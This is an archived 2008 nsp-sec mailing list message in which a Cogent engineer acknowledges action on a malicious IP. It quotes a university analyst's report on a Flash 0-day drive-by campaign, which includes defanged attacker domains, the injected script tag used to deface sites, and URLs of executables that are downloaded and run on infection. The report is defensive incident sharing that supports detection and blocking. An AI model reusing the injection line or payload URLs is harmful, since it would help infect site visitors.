[nsp-sec] ACK 174 RE: (AS 4837) (Upstream AS 174, 701, 1239, 3257, 3320, 4134, 7018, 7473) Adobe Flash Vulnerability - Details Seen In The Wild
Shelton, Steve
sshelton at Cogentco.com
Wed May 28 06:15:06 EDT 2008
- Previous message: [nsp-sec] (AS 4837) (Upstream AS 174, 701, 1239, 3257, 3320, 4134, 7018, 7473) Adobe Flash Vulnerability - Details Seen In The Wild
- Next message: [nsp-sec] ACK 3320 RE: (AS 4837) (Upstream AS 174, 701, 1239, 3257, 3320, 4134, 7018, 7473) Adobe Flash Vulnerability - Details Seen In The Wild
- Messages sorted by:
[ date ]
[ thread ]
[ subject ]
[ author ]
Hello,
The /32 is suffering reduced visibility on Cogent's network.
PEER_AS | IP | AS Name
174 | 221.206.20.145 | COGENT Cogent/PSI
Best regards,
Steve Shelton
Network Security Engineer
Cogent Communications
-----Original Message-----
From: nsp-security-bounces at puck.nether.net
[mailto:nsp-security-bounces at puck.nether.net] On Behalf Of Brian Eckman
Sent: Tuesday, May 27, 2008 4:09 PM
To: nsp-security at puck.nether.net
Subject: [nsp-sec] (AS 4837) (Upstream AS 174, 701, 1239, 3257, 3320,
4134, 7018, 7473) Adobe Flash Vulnerability - Details Seen In The Wild
----------- nsp-security Confidential --------
nsp-sec,
> host www.dota11.cn
www.dota11.cn has address 221.206.20.145
> host www.woai117.cn
www.woai117.cn has address 221.206.20.145
> host www.117276.cn
www.117276.cn has address 221.206.20.145
AS | IP | AS Name
4837 | 221.206.20.145 | CHINA169-BACKBONE CNCGROUP China169
Backbone
PEER_AS | IP | AS Name
174 | 221.206.20.145 | COGENT Cogent/PSI
701 | 221.206.20.145 | UUNET - MCI Communications Services, Inc.
d/b/a
Verizon Business
1239 | 221.206.20.145 | SPRINTLINK - Sprint
3257 | 221.206.20.145 | TISCALI-BACKBONE Tiscali Intl Network BV
3320 | 221.206.20.145 | DTAG Deutsche Telekom AG
4134 | 221.206.20.145 | CHINANET-BACKBONE No.31,Jin-rong Street
7018 | 221.206.20.145 | ATT-INTERNET4 - AT&T WorldNet Services
7473 | 221.206.20.145 | SINGTEL-AS-AP Singapore Telecom
(Malicious URLs sanitized to (dot)cn instead of .cn to avoid accidental
access.)
This is all based off my experience with this problem this afternoon,
and is
surely incomplete. However, I hope that it's timely and helpful
regardless...
Many of you have probably seen reports of a 0-day exploit in Adobe Flash
Player. SANS Internet Storm Center has a diary entry at
http://isc.sans.org/diary.html?n&storyid=4465. Symantec raised their
ThreatCon as outlined at
http://www.symantec.com/security_response/threatconlearn.jsp
I've seen evidence of a mass defacement (similar - likely identical - to
the
recent SQL injections apparently coming from China and noted in various
advisories), where <script src=http://www.dota11(dot)cn/m.js> has
been inserted into the HTML source of many Web sites. m.js on that site,
among other things, loads up http://www.woai117(dot)cn/4561.swf or
http://www.woai117(dot)cn/4562.swf. After one of those flash scripts
determines the flash version, the browser is then pointed to
http://www.woai117(dot)cn/WIN%20<insert-flash-player-version-here>[f|i].
swf
(example: http://www.woai117(dot)cn/WIN%209,0,115,0f.swf for Adobe Flash
Player 9,0,115,0 for Windows) (likely more than just the letters "f" and
"i"
can be appended - again - I'm just sharing what I've observed in limited
testing).
In my testing, the exploits for 9,0,124,0 are NOT there, even though
browsers will be pointed to a page like "WIN%209,0,124,0f.swf" (a 404
page
is returned with no additional exploits, as far as I've seen). My hunch
is
that there were exploits for that version earlier (simply based off of
Symantec's claim), but pulled it for some reason - perhaps to try to
keep
certain 0day code as 0day for longer. (Or else Symantec is wrong. Not
like
that ever happens!) ;-)
On my test XP box with Flash Viewer 9,0,115,0, the "GET
/WIN%209,0,115,0f.swf" request downloaded the .swf, which in turn
ultimately
caused all of the following to be downloaded and executed:
http://www.woai117(dot)cn/117.exe
http://www.117276(dot)cn/1.exe
http://www.117276(dot)cn/2.exe
http://www.117276(dot)cn/3.exe
http://www.woai117(dot)cn/bing.exe
http://www.woai117(dot)cn/kiss.txt
The snort rule "ET TROJAN Otwycal User-Agent (Downing)" was triggered by
most, if not all of those downloads.
117.exe analysis
----------------
Virustotal:
http://www.virustotal.com/analisis/20e51bbef245e3eeb3dd9b9835c09291
http://anubis.iseclab.org/result.php?taskid=62147cf6aaf70fc4a5fa20516483
924c
Anubis Sandbox:
http://anubis.iseclab.org/result.php?taskid=62147cf6aaf70fc4a5fa20516483
924c
I believe that queries for "www.117276(dot)cn" might be a reliable
indicator
of a successful infection - particularly if preceded by
"www.dota11(dot)cn"
and "www.woai117(dot)cn".
Brian
--
Brian Eckman, Security Analyst
University of Minnesota
Office of Information Technology
Security & Assurance
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the
nsp-security
community. Confidentiality is essential for effective Internet security
counter-measures.
_______________________________________________
- Previous message: [nsp-sec] (AS 4837) (Upstream AS 174, 701, 1239, 3257, 3320, 4134, 7018, 7473) Adobe Flash Vulnerability - Details Seen In The Wild
- Next message: [nsp-sec] ACK 3320 RE: (AS 4837) (Upstream AS 174, 701, 1239, 3257, 3320, 4134, 7018, 7473) Adobe Flash Vulnerability - Details Seen In The Wild
- Messages sorted by:
[ date ]
[ thread ]
[ subject ]
[ author ]
More information about the nsp-security
mailing list